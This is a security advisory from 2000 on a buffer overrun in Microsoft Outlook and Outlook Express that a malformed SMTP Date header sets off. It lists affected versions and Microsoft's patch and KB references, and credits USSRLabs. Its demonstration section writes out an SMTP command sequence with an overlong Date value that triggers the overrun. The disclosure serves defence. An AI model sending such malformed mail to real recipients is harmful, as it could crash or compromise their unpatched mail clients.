Unchecked Buffer in Outlook May Run Arbitrary Code

Reported July 19 by USSRLabs

VERSIONS AFFECTED
  • Microsoft Outlook Express 4.0 - 5.01
  • Microsoft Outlook 97, 98, and 2000

DESCRIPTION

An unchecked buffer in Outlook may allow a malformed Date parameter to cause arbitrary code to execute on the system. The overrun occurs when a string is appended to the end of the Date parameter in the SMTP mail header, as seen in the example below.

DEMONSTRATION

The following series of SMTP mail commands will initiate the buffer overrun when the user receives the email via an unpatched version of Outlook:

HELO
MAIL FROM: someone@somedomain
RCPT TO: target@someotherdomain
DATA
Date: Thu,19 Jul 2000  11:11:00
+1111111111111111111111111111111111111111111111111111111111111
.
QUIT

USSRLabs has also made available a series of client-side tools that demonstrate the problem.

VENDOR RESPONSE

Microsoft issued FAQ# FQ00-043 regarding this problem along with a patch and Support Online article Q267884, which also pertain to security issues MS00-043 and MS00-046.

Microsoft's bulletin states that "this vulnerability can be eliminated by taking any of the following actions:

• Installing the patch available at
  http://www.microsoft.com/windows/ie/download/critical/patch9.htm
• Performing a default installation of Internet Explorer 5.01 Service Pack 1,
  http://www.microsoft.com/Windows/ie/download/ie501sp1.htm.
• Performing a default installation of Internet Explorer 5.5
  (http://www.microsoft.com/windows/ie/download/ie55.htm)
  on any system except Windows 2000.

Note: The patch requires IE 4.01 SP2 (http://www.microsoft.com/windows/ie/download/ie401sp2.htm) or IE 5.01 (http://www.microsoft.com/windows/ie/download/ie501.htm) to install. Customers who install this patch on versions other than these may receive a message reading "This update does not need to be installed on this system". This message is incorrect. More information is available in KB article Q267884"

CREDIT
Discovered by USSRLabs